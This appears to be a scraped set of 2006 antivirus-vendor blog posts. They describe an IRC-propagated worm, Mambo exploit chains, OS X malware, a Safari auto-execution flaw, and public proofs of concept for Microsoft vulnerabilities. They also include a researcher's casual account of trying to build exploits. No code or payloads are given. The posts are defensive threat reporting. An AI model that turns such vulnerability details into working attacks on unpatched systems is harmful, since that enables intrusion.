We received a malware and here are some details.
Filename: RR-0922-014.exeFilesize: 5,492 bytes
MD5: EBC2BA74578CB23AF083C89B31060A28
Detection (as of 2006-02-25 22:23:34)
Trend Micro: | PAK_Generic.001 |
続きを読む
We received a malware and here are some details.
Filename: RR-0922-014.exeTrend Micro: | PAK_Generic.001 |
Remember our previous post on IM worms that chat with the target? Well, here’s a similar instance. Check it out.
Current detection:
FileName : SexyGirl.zip/SexyGirl.scr
TrendMicro : PAK_Generic.001
Based on initial-string-based-analysis, we did not find the strings of the chat in the malware. Taking out the possibility that it is encrypted (for simplicity’s sake), it could mean that the “chatters” (latia, Whyn0tt_87, D115ny_cute) are actual bot-infected-systems which were instructed to propagate the malicious link via IRC. Much like the AOL propagation used by bots. The Botmaster can control the links. Or, the botmasters created legal irc ‘bots’ that park on the channel and sends the messages to the users of the channels. Yes, there are legal irc ‘bots’. Google on irc bots.
Update(JJ, 23 February 2006 00:14:56)
So I decided to delve deeper into this bot, and the botmaster does control the irc messages that it sends out. This is its infection vector, as the bot does not have any commands to exploit other systems automatically. Also, this bot does not join a channel, AND, the server that it joins is a legit channel. The bot master has a script to tell the infected systems to “propagate” the “Sexy Girl” and “Full Sex Movie” links. And still, there are many users who are infected (based on the logs that I took).
Pport 80 malware is quite high, particularly those exploiting the Mambo mosConfig exploit. This exploit is not new. It just means that attackers are still able to succesfully compromise vulnerable machines.
The exploit downloads a shell script, which in turn downloads and executes other malware including the actual worm that does the exploiting (it also has a module for exploiting the XML-RPC vulnerability), as well as an IRC client (yes, to take part in an eveeel-botnet server).
What malwares are these you say? Check out our Virus Encyclopedia for the following malwares:
And if I missed something, you can always check our Advisories page for the latest malwares from our honeypots.
続きを読むAfter OSX_LEAP.A, here comes another malware-poc for OSX: OSX_INQTANA.A.
I leave the link-clicking-read-the-details to you.
A couple of days after Microsoft released their monthly security patch, proof-of-concept (PoC) code was posted by FrSIRT targeting MS06-005 vulnerability. (Check our previous blog entry here.)
Another version of the exploit code was released and posted by FrSIRT for MS06-005: Vulnerability in Windows Media Player Could Allow Remote Code Execution.
On the other hand, a proof of concept on MS06-009: Vulnerability in the Korean Input Method Editor Could Allow Elevation of Privilege [ShellAbout() API Elevation of Privilege] was posted by the Securiteam. (This one’s really easy to do) :)
Visit the following link for Trend Micro’s information on Microsoft’s February Security patch.
Yesterday, i started playing around with the MS06-006 vulnerability(the one with the BMP thingie). I must have spent around… 3 hours trying to grab EIP. I gave up after a while because I could not find any constant address. And I just found out today that another person who has been playing around with MS06-006 had the same conclusion. The crashes were random, and it’s not that easy to create a reliable exploit for this. Mostly, just a DOS.
So last night, while the girlfriend was watching Brokeback Mountain (i had too much fun creating my own dialogue for the characters, the girlfriend got annoyed since she could not listen to the story, so she kicked me out of the tv area), i decided to do the MS06-005 vulnerability, or the Windows-Media-Player-Embed-Src-vuln-for-other-browsers-except-IE.
Which means, if you’re using firefox, or other browsers (i’m not sure what type of browsers exactly), better patch now if you’re still using firefox. The exploit is fairly easy to create, and allows for automatic code execution. Spyware, anyone?
Update(JJ, 17 February 2006 17:08:02)
FR-Sirt now has a Metasploit plugin for this exploit on their site.
An article had been published describing a flaw in Apple Safari Browser running on OS X. The flaw is said to cause immediate execution of files by just visiting a website.
An option in the browser “open ‘safe’ files after downloading” (activated by default), causes the browser to automatically execute safe files like zip. However a shellscript with no “shebang line” such as “#!/bin/bash” will be executed without user interaction. Read the article here for the full story.
For now it is highly recommended to disable the option “Open ‘safe’ files after downloading” until an update that fixes the flaw is made available.
Update(JJ, 21 February 2006 18:20:49)
Updates from ISC.
This actually looks more serious then we initially thought it is. The workaround specified above will prevent Safari from automatically executing the PoC file, but it looks like your machine is still vulnerable and it doesn’t need Safari to run this file at all.
Update(JJ, 23 February 2006 20:30:27)
More updates from ISC!
…the Mail application is vulnerable as well. What’s even worse, the attacker doesn’t need to send a ZIP archive; the shell script itself can be disguised to practically anything.
Here’s the link again: http://isc.sans.org/diary.php?storyid=1138A new MacOS X worm is making the rounds on the net disguising itself as pictures of “MacOS X Leopard” an upcoming version of MacOS X.
Some important points for this malware was taken from a forum at
http://www.ambrosiasw.com/forums/index.php?showtopic=102379
You cannot be infected by this unless you do all of the following:
… and then for most users, you must also enter your Admin password.
You cannot simply “catch” the virus. Even if someone does send you the “latestpics.tgz” file, you cannot be infected unless you unarchive the file, and then open it.
So just to be on the safe side, don’t download the file hehe. =p
More info can be found on the forum mentioned above.
Update(JoneZ, 17 February 2006 14:06:34)
Further analysis shows that this malware can propagate via iChat. Trend Micro will be detecting this malware as OSX_LEAP.A (yup it’s a new prefix OSX_).
More details about this malware can be found in the following links:
The Proof of Concept for the Microsoft Security Bulletin MS06-005: Vulnerability in Windows Media Player Could Allow Remote Code Execution that was released last Valentine’s day is now available in FrSIRT.
The vulnerability in Windows Meida Player exists because of the way it handles processing bitmap files. With the use of a constructed malicious bitmap file an attacker can exploit the said vulnerability with the use of a malicious website that a user can visit or through viewing a malicious e-mail message.
An attacker who successfully exploited this vulnerability could take complete control of an affected system but a significant interaction from users is required to succesfully exploit this vulnerability.
Its time again for that time of the month… Let’s all patch our machines for a safer computer world.
Microsoft has already released their Security Updates for February; the updates include 2 Critical and 5 Important Updates.
Critical Updates
Important Updates
Read more on the updates here.